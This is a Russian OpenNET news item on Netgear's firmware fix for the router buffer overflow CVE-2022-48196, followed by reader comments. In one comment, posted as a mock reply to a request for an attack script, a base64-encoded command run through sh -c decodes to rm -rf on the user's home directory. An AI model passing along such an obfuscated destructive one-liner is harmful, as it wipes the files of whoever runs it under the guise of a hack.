The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Уязвимость в устройствах Netgear, эксплуатируемая на стадии до аутентификации

03.01.2023 08:26

Компания Netgear выпустила обновление прошивок к беспроводным маршрутизаторам серий RAX40, RAX35, R6400v2, R6700v3, R6900P, R7000P, R7000, R7960P и R8000P, в которых устранена уязвимость (CVE-2022-48196), позволяющая добиться переполнения буфера без прохождения аутентификации. Технические детали и информация о наличии эксплоитов пока не приводится, но судя по выставленному уровню опасности и рекомендации незамедлительно обновить прошивку, проблема напоминает ноябрьскую уязвимость, позволявшую добиться выполнения своего кода с правами root через манипуляции во внешней сети на стороне WAN-интерфейса.

  1. Главная ссылка к новости (https://kb.netgear.com/0000654...)
  2. OpenNews: Уязвимость в маршрутизаторах Netgear, приводящая к удалённому выполнению кода
  3. OpenNews: Уязвимости в устройствах NETGEAR, позволяющие получить доступ без аутентификации
  4. OpenNews: 0-day уязвимость в устройствах Netgear, позволяющая удалённо получить root-доступ
  5. OpenNews: Уязвимости, позволяющие захватить управление коммутаторами Cisco, Zyxel и NETGEAR на чипах RTL83xx
  6. OpenNews: Уязвимость в устройствах Netgear, позволяющая получить управление без аутентификации
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/58421-netgear
Ключевые слова: netgear
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (19) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 09:34, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Готовый скрипт есть у кого? Чтобы сразу запустил, и всех поломал, не вникая в скучные детали?
     
     
  • 2.2, Аноним (2), 09:39, 03/01/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Да
     
  • 2.3, Аноним (3), 09:39, 03/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Кнопка "сделать мне всё за***сь"? Вернее, "сделать меня кулхацкором"
     
  • 2.6, Аноним (6), 11:53, 03/01/2023 [^] [^^] [^^^] [ответить]  
  • +3 +/
    HACK='echo "ZGF0ZQo=" | base64 -d'; sh -c $HACK
     
     
  • 3.11, aploskov.dev (ok), 13:30, 03/01/2023 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Тогда уж, чтоб запомнилось.

    HACK='echo 'cm0gLXJmICIvaG9tZS8kVVNFUi8qIg==' | base64 -d'; sh -c $HACK

     

  • 1.4, Аноним (4), 10:32, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    хорошая закладка для господина Майора... хорошая.
    Теперь прийдется новую делать - отстой..
     
     
  • 2.8, Аноним (8), 12:31, 03/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    прежнего майора повысили, не гоже оставлять свои наработки для молодняка
     
  • 2.9, Аноним (9), 12:40, 03/01/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ты что это же теория заговора, ай-яй-яй. Ты же знаешь что теорий заговора не существует, а тебе должно быть стыдно за то что ты поднял голову и начал ей думать самостоятельно.
     
     
  • 3.20, Кирилл (??), 12:49, 04/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    О том и речь, что конспирология и "думать головой" - это вещи взаимоисключающие.
     

  • 1.5, InuYasha (??), 11:30, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Эти хоть патчат - и то молодцы.
     
  • 1.7, Аноним (7), 11:56, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    >CVE-2022-48196
    >2022

    А обновление выпущено в 2023, а не в тот же день! Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

     
     
  • 2.14, Атон (?), 14:29, 03/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

    Всех, кого нужно, поимели задолго до того.  Так и узнали об уязвимости.

     

  • 1.12, Аноним (-), 14:11, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > переполнения буфера

    Годы идут, но нестареющая классика продолжает радовать людей.

     
     
  • 2.18, Аноним (18), 00:59, 04/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Буфера всегда радуют. Ну где-то с 13 лет и до самой старости.
     
     
  • 3.19, Аноним (19), 09:52, 04/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Особенно, когда удаётся выйти за границы буфера.
     

  • 1.15, Аноним (15), 18:51, 03/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Даже у нетгира нет денег и авторитета нанять настоящих сишников…
     
     
  • 2.16, Аноним (19), 21:40, 03/01/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ору.
     
  • 2.17, Аноним (-), 00:21, 04/01/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Да они так то довольно среднепаршивая фирма. По жизни всякая хня с прошивками.
     

  • 1.21, Омоним (?), 02:59, 06/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Пластик у Netgear-овского железа - просто оцтой. А тут еще и вот это сцамое.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2022 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру